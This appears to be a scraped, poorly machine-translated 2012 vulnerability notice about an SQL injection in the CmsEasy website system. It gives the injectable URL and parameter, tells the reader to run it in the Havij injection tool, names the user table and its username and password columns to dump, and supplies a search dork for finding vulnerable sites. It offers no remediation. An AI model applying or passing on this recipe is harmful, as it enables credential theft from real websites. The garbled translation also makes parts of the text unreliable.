CmsEasy easy through the enterprise website system latest injection vulnerability-vulnerability warning-the black bar safety net

2012-06-12T00:00:00
ID MYHACK58:62201234086
Type myhack58
Reporter 佚名
Modified 2012-06-12T00:00:00

Description

Easy to pass business website system latest injection vulnerabilities.

Injection EXP:

http://www.xxx.com/celive/js/include.php?cmseasylive=1111&departmentid=0

Directly on Havij the inside run. 错误 关键字 :online.gif

Add the table name: cmseasy_user

List: userid,username,password

Baidu keywords: Powered by CmsEasy